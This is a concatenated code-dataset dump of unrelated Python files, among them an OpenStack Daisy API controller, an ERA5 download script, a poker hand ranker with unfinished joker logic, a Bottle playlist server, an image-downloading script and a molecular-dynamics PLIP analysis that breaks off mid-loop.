daisy.api import policy\nimport daisy.api.v1\nfrom daisy.api.v1 import controller\nfrom daisy.api.v1 import filters\nfrom daisy.common import exception\nfrom daisy.common import utils\nfrom daisy.common import wsgi\nfrom daisy import i18n\nfrom daisy import notifier\nimport daisy.registry.client.v1.api as registry\nimport daisy.api.backends.common as daisy_cmn\n\nLOG = logging.getLogger(__name__)\n_ = i18n._\n_LE = i18n._LE\n_LI = i18n._LI\n_LW = i18n._LW\nSUPPORTED_PARAMS = daisy.api.v1.SUPPORTED_PARAMS\nSUPPORTED_FILTERS = daisy.api.v1.SUPPORTED_FILTERS\nACTIVE_IMMUTABLE = daisy.api.v1.ACTIVE_IMMUTABLE\n\nCONFIG_ITEMS = ['name', 'config_file', 'service', 'section_name', 'data_type']\n\n\ndef check_template_config_format(template):\n def check_service_format(services):\n \"\"\"\n \"service\": {\n \"compute\": {\"force_type\": \"service\"},\n \"glance\": {\"force_type\": \"none\"}\n }\n \"\"\"\n for service_name, service_value in services.items():\n if service_name not in daisy_cmn.service_map.keys():\n raise HTTPBadRequest(\"service '%s' not in service table\" %\n service_name)\n if 'force_type' not in service_value \\\n or service_value['force_type'] not in ['service', 'node',\n 'none']:\n raise HTTPBadRequest(\"No force_type or error force_type value\"\n \" in service\")\n\n def check_data_type(config):\n if config['data_type'] not in ['int', 'string', 'list', 'boolean',\n 'float', 'ipaddr', 'password']:\n raise HTTPBadRequest(\"data_type '%s' in '%s' not support\" % (\n config['data_type'], config['name']))\n\n if not template:\n raise HTTPBadRequest('Template config is null!')\n\n for value in template.values():\n for item in CONFIG_ITEMS:\n if not value.get(item):\n raise HTTPBadRequest('No service or config file found in '\n 'template config!')\n check_data_type(value)\n check_service_format(value['service'])\n\n\nclass Controller(controller.BaseController):\n \"\"\"\n WSGI controller for template_configs resource in Daisy v1 API\n\n The template_configs resource API is a RESTful web service for\n template_config data.\n The API is as follows::\n\n GET /template_configs -- Returns a set of brief metadata about\n template_configs\n GET /template_configs/detail -- Returns a set of detailed metadata\n about emplate_configs\n HEAD /template_configs/ --\n Return metadata about an template_config with id \n GET /template_configs/ --\n Return template_config data for template_config with id \n POST /template_configs --\n Store template_config data and return metadata about the\n newly-stored template_config\n PUT /template_configs/ --\n Update template_config metadata and/or upload template_config\n data for a previously-reserved template_config\n DELETE /template_configs/ -- Delete the template_config with \n \"\"\"\n\n def __init__(self):\n self.notifier = notifier.Notifier()\n registry.configure_registry_client()\n self.policy = policy.Enforcer()\n\n def _enforce(self, req, action, target=None):\n \"\"\"Authorize an action against our policies\"\"\"\n if target is None:\n target = {}\n try:\n self.policy.enforce(req.context, action, target)\n except exception.Forbidden:\n raise HTTPForbidden()\n\n def _get_filters(self, req):\n \"\"\"\n Return a dictionary of query param filters from the request\n\n :param req: the Request object coming from the wsgi layer\n :retval a dict of key/value filters\n \"\"\"\n query_filters = {}\n for param in req.params:\n if param in SUPPORTED_FILTERS:\n query_filters[param] = req.params.get(param)\n if not filters.validate(param, query_filters[param]):\n raise HTTPBadRequest(_('Bad value passed to filter '\n '%(filter)s got %(val)s')\n % {'filter': param,\n 'val': query_filters[param]})\n return query_filters\n\n def _get_query_params(self, req):\n \"\"\"\n Extracts necessary query params from request.\n\n :param req: the WSGI Request object\n :retval dict of parameters that can be used by registry client\n \"\"\"\n params = {'filters': self._get_filters(req)}\n\n for PARAM in SUPPORTED_PARAMS:\n if PARAM in req.params:\n params[PARAM] = req.params.get(PARAM)\n return params\n\n def _raise_404_if_cluster_deleted(self, req, cluster_id):\n cluster = self.get_cluster_meta_or_404(req, cluster_id)\n if cluster['deleted']:\n msg = _(\"cluster with identifier %s has been deleted.\") % \\\n cluster_id\n raise HTTPNotFound(msg)\n\n @utils.mutating\n def get_template_config(self, req, id):\n \"\"\"\n Returns metadata about an template_config in the HTTP headers of the\n response object\n\n :param req: The WSGI/Webob Request object\n :param id: The opaque template_config identifier\n\n :raises HTTPNotFound if template_config metadata is not\n available to user\n \"\"\"\n self._enforce(req, 'get_template_config')\n template_config_meta = self.get_template_config_meta_or_404(req, id)\n return {'template_config_meta': template_config_meta}\n\n def list_template_config(self, req):\n \"\"\"\n Returns detailed information for all available template_configs\n\n :param req: The WSGI/Webob Request object\n :retval The response body is a mapping of the following form::\n\n {'template_configs': [\n {'id': ,\n 'name': ,\n 'description': ,\n 'created_at': ,\n 'updated_at': ,\n 'deleted_at': |,}, ...\n ]}\n \"\"\"\n self._enforce(req, 'list_template_config')\n params = self._get_query_params(req)\n try:\n template_configs = registry.list_template_config_metadata(\n req.context, **params)\n except exception.Invalid as e:\n raise HTTPBadRequest(explanation=e.msg, request=req)\n return dict(template_configs=template_configs)\n\n @utils.mutating\n def import_template_config(self, req, template_config_meta):\n self._enforce(req, 'import_template_config')\n try:\n template = json.loads(template_config_meta.get('template', None))\n except ValueError as e:\n LOG.error(e.message)\n raise HTTPBadRequest(explanation=e.message, request=req)\n check_template_config_format(template)\n template_config_meta = registry.import_template_config_metadata(\n req.context, template_config_meta)\n return {'template_config_meta': template_config_meta}\n\n\nclass TemplateConfigSetDeserializer(wsgi.JSONRequestDeserializer):\n \"\"\"Handles deserialization of specific controller method requests.\"\"\"\n\n def _deserialize(self, request):\n result = {}\n result[\"template_config_meta\"] = utils.get_dict_meta(request)\n return result\n\n def add_template_config(self, request):\n return self._deserialize(request)\n\n def update_template_config(self, request):\n return self._deserialize(request)\n\n def import_template_config(self, request):\n return self._deserialize(request)\n\n\nclass TemplateConfigSetSerializer(wsgi.JSONResponseSerializer):\n \"\"\"Handles serialization of specific controller method responses.\"\"\"\n\n def __init__(self):\n self.notifier = notifier.Notifier()\n\n def add_template_config(self, response, result):\n template_config_meta = result['template_config_meta']\n response.status = 201\n response.headers['Content-Type'] = 'application/json'\n response.body = self.to_json(\n dict(template_config=template_config_meta))\n return response\n\n def delete_template_config(self, response, result):\n template_config_meta = result['template_config_meta']\n response.status = 201\n response.headers['Content-Type'] = 'application/json'\n response.body = self.to_json(\n dict(template_config=template_config_meta))\n return response\n\n def get_template_config(self, response, result):\n template_config_meta = result['template_config_meta']\n response.status = 201\n response.headers['Content-Type'] = 'application/json'\n response.body = self.to_json(\n dict(template_config=template_config_meta))\n return response\n\n def import_template_config(self, response, result):\n response.status = 201\n response.headers['Content-Type'] = 'application/json'\n response.body = self.to_json(result)\n return response\n\n\ndef create_resource():\n \"\"\"template_configs resource factory method\"\"\"\n deserializer = TemplateConfigSetDeserializer()\n serializer = TemplateConfigSetSerializer()\n return wsgi.Resource(Controller(), deserializer, serializer)\n","sub_path":"code/daisy/daisy/api/v1/template_configs.py","file_name":"template_configs.py","file_ext":"py","file_size_in_byte":10481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"49973535","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"Downloads ERA5 geopotential data via the ECMWF Web API and saves it to the location as specified in config.py.\n\nFirst `install CDS API key`_. The data used for this analysis is not listed in the CDS download data web form. ECMWF\nMARS keywords are used to request this data. For more information about the request parameters see the `ERA5 catalogue`_\nand the `ERA5 documentation`_. The ERA5 catalogue form shows the available data and generates Python code for executing\nthe data request.\n\nExample::\n\n $ python download_geopotential_data.py\n\n.. _install CDS API key:\n https://cds.climate.copernicus.eu/api-how-to\n.. _ERA5 catalogue:\n http://apps.ecmwf.int/data-catalogues/era5\n.. _ERA5 documentation:\n https://software.ecmwf.int/wiki/display/CKB/ERA5+data+documentation\n\n\"\"\"\n\nimport cdsapi\nimport os\n\nfrom config import area, grid, era5_data_dir, geopotential_file_name\n\n\ndef download_data():\n \"\"\"Construct request and download data to [output_dir]/era5_geopotential_data.netcdf.\n\n Args:\n data_request (dict): Data request property name and value pairs.\n\n \"\"\"\n client = cdsapi.Client() # Connect to server.\n\n # Default data request configuration - do not change.\n request_config = {\n \"class\": \"ea\",\n \"expver\": \"1\",\n \"stream\": \"oper\",\n \"type\": \"an\",\n \"levtype\": \"sfc\",\n \"param\": \"129.128\",\n \"date\": \"2018-01-01\",\n \"time\": \"00:00:00\",\n \"format\": \"netcdf\",\n }\n\n # Add the area to request_config.\n request_config['area'] = area\n\n # Add the grid to request_config.\n if grid == 'fine':\n request_config['grid'] = \"0.1/0.1\"\n elif grid == 'coarse':\n request_config['grid'] = \"0.25/0.25\"\n else:\n raise ValueError(\"Invalid grid parameter provided in config.py, opt between 'fine' or 'coarse'.\")\n\n if not os.path.isdir(era5_data_dir):\n raise ValueError(\"Data target directory as specified in config.py does not exist, change it to an existing\"\n \"directory.\")\n\n # Add the save file location to request_config.\n target_file = os.path.join(era5_data_dir, geopotential_file_name)\n\n if os.path.exists(target_file):\n raise ValueError(\"File ({}) already exists. To start the download, remove the file and try again.\"\n .format(target_file))\n else:\n print(\"Saving data in: \" + target_file)\n client.retrieve(\"reanalysis-era5-complete\", request_config, target_file)\n print(\"Download complete.\")\n\n\nif __name__ == '__main__':\n download_data()\n","sub_path":"download_geopotential_data.py","file_name":"download_geopotential_data.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"478697611","text":"# -*- encoding: utf-8 -*-\nfrom supriya.tools.nonrealtimetools.SessionObject import SessionObject\n\n\nclass Moment(SessionObject):\n \"\"\"\n A moment-in-time referencing a singleton non-realtime state.\n\n ::\n\n >>> session = nonrealtimetools.Session()\n >>> moment = session.at(10.5)\n\n \"\"\"\n\n ### CLASS VARIABLES ###\n\n __documentation_section__ = 'Session Objects'\n\n __slots__ = (\n '_offset',\n '_propagate',\n '_session',\n '_state',\n )\n\n ### INITIALIZER ###\n\n def __init__(self, session, offset, state, propagate=True):\n SessionObject.__init__(self, session)\n self._offset = offset\n self._state = state\n self._propagate = bool(propagate)\n\n ### SPECIAL METHODS ###\n\n def __enter__(self):\n self.session.active_moments.append(self)\n if self.propagate:\n self.session._apply_transitions(self.state.offset)\n return self\n\n def __eq__(self, expr):\n if not isinstance(expr, type(self)):\n return False\n if expr.session is not self.session:\n return False\n return expr.offset == self.offset\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.session.active_moments.pop()\n if self.propagate:\n self.session._apply_transitions(self.state.offset)\n\n def __lt__(self, expr):\n if not isinstance(expr, type(self)) or expr.session is not self.session:\n raise ValueError(expr)\n return self.offset < expr.offset\n\n def __repr__(self):\n return '<{} @{!r}>'.format(\n type(self).__name__,\n self.offset,\n )\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def offset(self):\n return self._offset\n\n @property\n def propagate(self):\n return self._propagate\n\n @property\n def state(self):\n return self._state\n","sub_path":"supriya/tools/nonrealtimetools/Moment.py","file_name":"Moment.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"592037801","text":"#-*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.conf.urls import (\n patterns, url\n)\n\nfrom .views import (publish_article, list_articles, search_articles, upload_image)\n\n\nurlpatterns = patterns('articles.views',\n url(r'^list/?$', list_articles, name='list_articles'),\n url(r'^search/$', search_articles, name='search_articles'),\n url(r'^(?P.+)/publish/$', publish_article, name='publish_article'),\n url(r'^upload/image/$', upload_image, name='upload_image'),\n)\n","sub_path":"djangosrc/pysrc/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"638888881","text":"'''\n8.9. Сообщения: создайте список с серией коротких сообщений. Передайте список\nфункции show_messages(), которая выводит текст каждого сообщения в списке\n'''\n\ndef show_messages(massages):\n\tfor massage in massages:\n\t\tprint(massage)\n\nmassages = ['Привет', 'Как дела?', 'Что делаешь?']\n\nshow_messages(massages)","sub_path":"book/8.9.py","file_name":"8.9.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"354942626","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# -----------------\n# Реализуйте функцию best_hand, которая принимает на вход\n# покерную \"руку\" (hand) из 7ми карт и возвращает лучшую\n# (относительно значения, возвращаемого hand_rank)\n# \"руку\" из 5ти карт. У каждой карты есть масть(suit) и\n# ранг(rank)\n# Масти: трефы(clubs, C), пики(spades, S), червы(hearts, H), бубны(diamonds, D)\n# Ранги: 2, 3, 4, 5, 6, 7, 8, 9, 10 (ten, T), валет (jack, J), дама (queen, Q), король (king, K), туз (ace, A)\n# Например: AS - туз пик (ace of spades), TH - дестяка черв (ten of hearts), 3C - тройка треф (three of clubs)\n\n# Задание со *\n# Реализуйте функцию best_wild_hand, которая принимает на вход\n# покерную \"руку\" (hand) из 7ми карт и возвращает лучшую\n# (относительно значения, возвращаемого hand_rank)\n# \"руку\" из 5ти карт. Кроме прочего в данном варианте \"рука\"\n# может включать джокера. Джокеры могут заменить карту любой\n# масти и ранга того же цвета, в колоде два джокерва.\n# Черный джокер '?B' может быть использован в качестве треф\n# или пик любого ранга, красный джокер '?R' - в качестве черв и бубен\n# любого ранга.\n\n# Одна функция уже реализована, сигнатуры и описания других даны.\n# Вам наверняка пригодится itertoolsю\n# Можно свободно определять свои функции и т.п.\n# -----------------\n\nfrom itertools import groupby, combinations\n\n\ndef ll(iterable):\n return len(list(iterable))\n\n\ndef all_equals(iterable):\n return ll(groupby(iterable)) == 1\n\n\ndef hand_rank(hand):\n \"\"\"Возвращает значение определяющее ранг 'руки'\"\"\"\n ranks = card_ranks(hand)\n if straight(ranks) and flush(hand):\n return (8, max(ranks))\n elif kind(4, ranks):\n return (7, kind(4, ranks), kind(1, ranks))\n elif kind(3, ranks) and kind(2, ranks):\n return (6, kind(3, ranks), kind(2, ranks))\n elif flush(hand):\n return (5, ranks)\n elif straight(ranks):\n return (4, max(ranks))\n elif kind(3, ranks):\n return (3, kind(3, ranks), ranks)\n elif two_pair(ranks):\n return (2, two_pair(ranks), ranks)\n elif kind(2, ranks):\n return (1, kind(2, ranks), ranks)\n else:\n return (0, ranks)\n\n\ndef card_ranks(hand):\n \"\"\"Возвращает список рангов (его числовой эквивалент),\n отсортированный от большего к меньшему\"\"\"\n total = '23456789TJQKA'\n return sorted([total.index(x[0]) for x in hand], reverse=True)\n\n\ndef flush(hand):\n \"\"\"Возвращает True, если все карты одной масти\"\"\"\n groups = groupby(hand, lambda x: x[1])\n return ll(groups) == 1\n\n\ndef straight(ranks):\n \"\"\"Возвращает True, если отсортированные ранги формируют последовательность 5ти,\n где у 5ти карт ранги идут по порядку (стрит)\"\"\"\n total = '.'.join([str(x) for x in reversed(range(2, 15))])\n return '.'.join([str(x) for x in ranks]) in total\n\n\ndef kind(n, ranks):\n \"\"\"Возвращает первый ранг, который n раз встречается в данной руке.\n Возвращает None, если ничего не найдено\"\"\"\n for rank, group in groupby(ranks):\n if ll(group) == n:\n return rank\n\n\ndef two_pair(ranks):\n \"\"\"Если есть две пары, то возврщает два соответствующих ранга,\n иначе возвращает None\"\"\"\n grouped = groupby(ranks)\n filtered = [rk for rk, gp in grouped if len(list(gp)) == 2]\n result = filtered[:2] if len(filtered) > 1 else None\n return result\n\n\ndef is_better_rank(a, b):\n is_better = False\n for x, y in zip(a, b):\n if x == y:\n continue\n is_better = x > y\n return is_better\n\n\ndef best_hand(hand):\n \"\"\"Из \"руки\" в 7 карт возвращает лучшую \"руку\" в 5 карт \"\"\"\n bhand = hand[:5]\n brank = hand_rank(bhand)\n\n for cur_hand in combinations(hand, 5):\n cur_rank = hand_rank(cur_hand)\n if is_better_rank(cur_rank, brank):\n brank = cur_rank\n bhand = cur_hand\n\n return bhand\n\n\ndef color(kind):\n if kind == 'C' or kind == 'S':\n return 'B'\n return 'R'\n\n\ndef wild_street(hand):\n pass\n\n\ndef wild_n(n, ranks, j_count):\n n = n - j_count\n for rank, group in groupby(ranks):\n if ll(group) >= n:\n return rank\n\n\ndef wild_flush(hand, jokers):\n groups = groupby(hand, lambda x: x[1])\n return ll(groups) == 1 and len(jokers) == 1 and color(hand[0][1]) == jokers[0][1]\n\n\ndef wild_full_house(ranks, hand, jokers):\n if len(jokers) == 2:\n kind(3,)\n\ndef best_wild_hand_one_joker(hand, j_color):\n bhand = None\n brank = None\n\n\n\n return None, None\n\n\ndef best_wild_hand_two_joker(hand):\n return None, None\n\n\ndef best_wild_hand(start_hand):\n jokers = [x for x in start_hand if '?' in x]\n hand = [x for x in start_hand if x not in jokers]\n\n bhand = best_hand(hand)\n brank = hand_rank(bhand)\n\n if len(jokers) == 0:\n return bhand\n\n for cur_hand in combinations(hand, 5):\n for joker in jokers:\n joker_bhand, jocker_brank = best_wild_hand_one_joker(cur_hand, joker)\n if is_better_rank(jocker_brank, brank):\n brank = jocker_brank\n bhand = joker_bhand\n\n if len(jokers) == 2:\n joker_bhand, jocker_brank = best_wild_hand_two_joker(hand)\n if is_better_rank(jocker_brank, brank):\n bhand = joker_bhand\n\n \"\"\"best_hand но с джокерами\"\"\"\n return bhand\n\n\ndef test_best_hand():\n print(\"test_best_hand...\")\n assert (sorted(best_hand(\"6C 7C 8C 9C TC 5C JS\".split()))\n == ['6C', '7C', '8C', '9C', 'TC'])\n assert (sorted(best_hand(\"TD TC TH 7C 7D 8C 8S\".split()))\n == ['8C', '8S', 'TC', 'TD', 'TH'])\n assert (sorted(best_hand(\"JD TC TH 7C 7D 7S 7H\".split()))\n == ['7C', '7D', '7H', '7S', 'JD'])\n print('OK')\n\n\ndef test_best_wild_hand():\n print(\"test_best_wild_hand...\")\n assert (sorted(best_wild_hand(\"6C 7C 8C 9C TC 5C ?B\".split()))\n == ['7C', '8C', '9C', 'JC', 'TC'])\n assert (sorted(best_wild_hand(\"TD TC 5H 5C 7C ?R ?B\".split()))\n == ['7C', 'TC', 'TD', 'TH', 'TS'])\n assert (sorted(best_wild_hand(\"JD TC TH 7C 7D 7S 7H\".split()))\n == ['7C', '7D', '7H', '7S', 'JD'])\n print('OK')\n\n\nif __name__ == '__main__':\n test_best_hand()\n test_best_wild_hand()\n","sub_path":"hw1_poker/poker.py","file_name":"poker.py","file_ext":"py","file_size_in_byte":7263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"66479379","text":"import nltk\r\nfrom utils.metrics.Metrics import Metrics\r\nfrom nltk import ngrams\r\n\r\nclass RefUniqueGram(Metrics):\r\n def __init__(self, test_text='',ref_text='', gram=3):\r\n super().__init__()\r\n self.name = 'RefUniqueGram'\r\n self.test_data = test_text\r\n self.ref_data=ref_text\r\n self.gram = gram\r\n self.sample_size = 500\r\n self.test_text=None\r\n self.reference_text = None\r\n self.is_first = True\r\n \r\n def get_score(self, ignore=False):\r\n if ignore:\r\n return 0\r\n if self.is_first:\r\n self.get_reference()\r\n self.get_test()\r\n self.is_first = False\r\n return self.get_ng()\r\n\r\n def get_ng(self):\r\n documentRef = self.get_reference()\r\n documentTest= self.get_test()\r\n length = len(documentTest) \r\n gramsRef = list()\r\n gramsTest = list()\r\n for sentence in documentRef:\r\n gramsRef += self.get_gram(sentence)\r\n \r\n for sentence in documentTest:\r\n gramsTest += self.get_gram(sentence)\r\n \r\n\r\n return len(set(gramsTest).difference(set(gramsRef)))/length\r\n\r\n def get_gram(self, tokens):\r\n grams = list()\r\n if len(tokens) < self.gram:\r\n return grams\r\n gram_generator = ngrams(tokens, self.gram)\r\n for gram in gram_generator:\r\n grams.append(gram)\r\n return grams\r\n\r\n\r\n def get_reference(self):\r\n if self.reference_text is None:\r\n reference = list()\r\n with open(self.ref_data) as ref_text:\r\n for text in ref_text:\r\n #text = text.strip().split(\" \")\r\n text= nltk.word_tokenize(text)\r\n reference.append(text)\r\n self.reference_text = reference\r\n return reference\r\n else:\r\n return self.reference_text\r\n\r\n def get_test(self): \r\n if self.test_text is None:\r\n test = list()\r\n with open(self.test_data) as test_text:\r\n for text in test_text:\r\n text = nltk.word_tokenize(text)\r\n test.append(text)\r\n self.test_text = test\r\n return test\r\n else:\r\n return self.test_text\r\n\r\n","sub_path":"utils/metrics/RefUniqueGram.py","file_name":"RefUniqueGram.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"246922678","text":"import time\n\nstart_time = time.time()\ndef f(n):\n if n == 1 or n == 2:\n return 1\n else:\n q = 1\n p = 1\n for i in range(3, n):\n temp = p + q\n p = q\n q = temp\n\n return p + q\n\ncounter = 1\nfibs = []\n\nwhile True:\n if f(counter) % 2 == 0:\n fibs.append(f(counter))\n elif f(counter) > 4000000:\n break\n\n counter = counter + 1\n\n\nprint(sum(fibs))\nprint(\"this took\", time.time() - start_time, \"seconds to execute.\")\n","sub_path":"problem_2.py","file_name":"problem_2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"20708239","text":"from bottle import route, run\nfrom bottle import get, post, request, delete # or route\nfrom database import db_connector\n\nconnector = db_connector()\n\n@get('/playlist')\ndef get_playlists():\n from bottle import response\n from json import dumps\n res = connector.read_all_playlists()\n print(res)\n response.content_type = 'application/json'\n return dumps(res)\n\n@get('/playlist/')\ndef get_playlists(id):\n from bottle import response\n from json import dumps\n res = connector.read_one_playlist(id)\n response.content_type = 'application/json'\n return dumps(res)\n\n\n@post('/playlist')\ndef add_playlist():\n playlistname = request.forms.get('playlistname')\n print(\"inserting \"+playlistname+\"in db\")\n connector.insert_playlist_in_db(playlistname)\n\n@get('/video')\ndef get_videos():\n from bottle import response\n from json import dumps\n res = connector.read_all_videos()\n response.content_type = 'application/json'\n return dumps(res)\n\n@post('/video')\ndef add_video():\n playlistid = request.forms.get('playlistid')\n Title = request.forms.get('title')\n Thumbnail = request.forms.get('thumbnail')\n connector.insert_video_in_playlist(playlistid, Title, Thumbnail)\n\n\n@delete('/video//playlist/')\ndef delete_video_from_playlist(videoid, playlistid):\n print(\"{} {}\".format(videoid, playlistid))\n connector.remove_one_video_from_playlist( playlistid, videoid)\n\n\nif __name__ == \"__main__\":\n print(\"starting web server\")\n print(\"Run Server\")\n run(host=\"0.0.0.0\", port=8081, debug=True, reloader=True)\n","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459126039","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#author:zhl\n\nimport tkinter\nfrom tkinter import ttk\nimport os\n\n\nclass InfoWindow(tkinter.Frame):\n def __init__(self,master):\n frame=tkinter.Frame(master)\n frame.grid(row=0,column=1)\n\n self.ev=tkinter.Variable()\n self.entry=tkinter.Entry(frame,textvariable=self.ev)\n self.entry.pack()\n\n self.txt=tkinter.Text(frame)\n self.txt.pack()","sub_path":"python 语法基础/d15_自动化办公与鼠标键盘模拟/1.树状目录层级作业/infoWindow.py","file_name":"infoWindow.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"554619461","text":"#-*- codeing = utf-8 -*-\nimport requests\nimport re\n# import time\nimport os\nprint('README!!!!!\\nREADME!!!!!\\nREADME!!!!!\\n说明:图片返回数量,范围为1到10,不提供 APIKEY 时固定为1\\nr18参数 0为���,1为是,2为混合\\n不指定关键词填0,若指定关键字,将会返回从插画标题、作者、标签中模糊搜索的结果\\n是否使用 master_1200 缩略图,以节省流量或提升加载速度,0为不使用,默认不使用')\nnumber = int(input('请输入要下载的图片数量:'))\nif number<1 or number>10 :\n print('瞎几把输,给你一张便宜你了')\n number = 1\n# r18yn = int(input('是否r18:'))\n# if r18yn<0 or r18yn>2 :\n# print('?')\n# r18yn = 0\n\nword = input('请输入图片关键词:')\n\nif word =='0':\n word=''\n# print(type(True))\n# size = input('是否要压缩图片:')\n# if size =='0':\n# size = 'false'\n# else:\n# size = 'true'\n# print(size)\ndata = {\n \"apikey\":'', #添加apikey\n # 'r18':r18yn, #添加r18参数 0为否,1为是,2为混合\n 'keyword':word, #若指定关键字,将会返回从插画标题、作者、标签中模糊搜索的结果\n 'num':number, #一次返回的结果数量,范围为1到10,不提供 APIKEY 时固定为1\n # 'size1200':False #是否使用 master_1200 缩略图,以节省流量或提升加载速度\n }\n\n\nresponse = requests.get('https://api.lolicon.app/setu/',params=data)\nhtml = response.text\n# print(html)\nurls1 = re.findall('url\":\"(.*?)\"',html)\nurls = str(urls1)\nurls = re.sub(r'\\\\','',urls)\npattern = 'i.pixiv.cat'\nurls = re.sub(pattern,\"www.pixivdl.net\",urls)\nurl_list = re.sub(\"'\",'',urls)\nurl_list = url_list.replace('[','')\nurl_list = url_list.replace(']','')\n\nurl_list = url_list.strip(',').split(',')\n# print(url_list)\ni = 0\nd = 'D:\\\\setu\\\\'\nfor url in url_list:\n path = d + url.split('/')[-1]\n i += 1\n print('正在下载第%d张图片' % i)\n\n try:\n\n if not os.path.exists(d):\n os.mkdir(d)\n\n if not os.path.exists(path):\n\n r = requests.get(url)\n\n r.raise_for_status()\n\n with open(path, 'wb') as f:\n\n f.write(r.content)\n\n f.close()\n\n print(\"图片保存成功\")\n\n else:\n\n print(\"图片已存在\")\n\n except:\n\n print(\"图片获取失败\")\nprint('图片全部下载完成')\n\n","sub_path":"nor18.py","file_name":"nor18.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"551956208","text":"import MDAnalysis as md\n\nimport pandas as pd\n\nfrom plip.structure.preparation import PDBComplex\n\nimport progressbar\n\nimport os\nimport sys\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ndef plipmd(topol=None,traj=None):\n\n\tif 'gro' in topol or '.tpr' in topol:\n\t\tprint ('''\\n\\n\n\n\t\t\tWARNING: For analysis using gromacs you SHOULD use .pdb topology\n\n\t\t\tRecomended gromacs (gmx) command to generate a PDB topology file:\\n\n\n\t\t\tgmx trjconv -f xyz.gro -o xyz.pdb -s xyz.tpr\n\n\t\t\t\\n\\n\n\t\t\t''')\n\telse: pass\n\n\ttraj=list(traj.strip('[]').split(','))\n\tu = md.Universe(topol,traj)\n\n\tif len (u.segments.segids) ==1:\n\t\tprint ('''\n\t\t\tWARNING: Only one segment was identified in system topology:{} \\n\\n\n\t\t\t'''.format(list(u.segments.segids)))\n\telse: \n\t\tprint ('\\nINFO: your system contains {} segments with labels: \\n {} \\n\\n'.format(len(u.segments),list(u.segments.segids)))\n\t\tprint ('''\n\t\t\t\\nWARNING: Segments IDs are considered CHAIN names for analysis. Maybe you can consider to chance Segments ID\\n\\n\n\t\t\t''')\n\t\t\n\t\tuser_confirmation=input('Do you want to define chain names to segments (yes/no):\\n>')\n\n\t\tif user_confirmation=='yes':\n\t\t\tchains_from_segments=input('Type the new name (chain) for every segment (SegId) in format: SegId1,A|SegID2,B|...|SegIdn,N:\\n>')\n\t\t\tnames=chains_from_segments.replace(' ','').split('|')\n\t\t\tfor name in names:\n\t\t\t\tsegid=name.split(',')[0]\n\t\t\t\tnewName=name.split(',')[1]\n\t\t\t\tfor segment in u.segments:\n\t\t\t\t\tif segment.segid == segid:\n\t\t\t\t\t\tsegment.segid=newName\n\t\t\tprint ('\\nINFO: your system contains {} segments with labels: \\n {} \\n\\n'.format(len(u.segments),list(u.segments.segids)))\n\t\n\n\tligand_name=input ('\\n\\n1) Type the ResName of your Ligand (must be 3 letter code -example: LIG -):\\n>')\n\n\tsol_name=input ('\\n2) Type the ResName of your Water (must be 3-4 letter code -example: WAT or SOL or TIP3 -):\\n>')\n\n\tfor res in u.residues:\n\t\tif res.resname==sol_name:\n\t\t\tres.resname='HOH'\n\t\tif 'HI' in res.resname or 'HSD' in res.resname:\n\t\t\tres.resname='HIS'\n\t\tif 'CY' in res.resname:\n\t\t\tres.resname='CYS'\n\tfor atom in u.atoms:\n\t\tif atom.name=='OH2':\n\t\t\tatom.name='OW'\n\n\tSystem=u.select_atoms('protein or (resname {} or resname HOH)'.format(ligand_name),updating=True)\n\tSystem=System.select_atoms('protein or resname {} or (around 7 resname {})'.format(ligand_name,ligand_name),updating=True)\n\n\t\n\tfor ts in u.trajectory[0:1]:\n\t\tname='frame_tmp.pdb'\n\t\tPDB= md.Writer(name, multiframe=False)\n\t\tPDB.write(System)\n\t\tplip_job = PDBComplex()\n\t\tplip_job.load_pdb(name) \n\t\tplip_job.analyze()\n\t\tprint ('\\nINFO:',plip_job,'\\n')\n\t\tligand=input('3) Type the name of the ligand in trajectory to analyze (- example: LIG:S:152 -):\\n>')\n\tos.remove(name)\n\n\ttable=pd.DataFrame()\n\tindex=0\n\tprint ('\\nINFO: Your trajectory lenght is:{} steps\\n'.format(range(len(u.trajectory))))\n\tstart=int(input('4) Type the starting STEP to analyze:\\n>'))\n\tfinish=int(input('\\n5) Type the ending STEP to analyze:\\n>'))\n\tbar=progressbar.ProgressBar(max_value=finish)\n\tprint ('\\n\\n----- ----- ----- RUNNING THE ANALYSIS ----- ----- -----\\n\\n')\n\tfor i in range(start,finish):\n\t\tname='frame_tmp.pdb'\n\t\tPDB= md.Writer(name, multiframe=False)\n\t\tfor ts in u.trajectory[i:i+1]:\n\t\t\tPDB.write(System)\n\t\t\tplip_job = PDBComplex()\n\t\t\tplip_job.load_pdb(name) \n\t\t\tplip_job.analyze()\n\t\t\tinteractions = plip_job.interaction_sets[ligand]\n\t\t\tfor interaction in 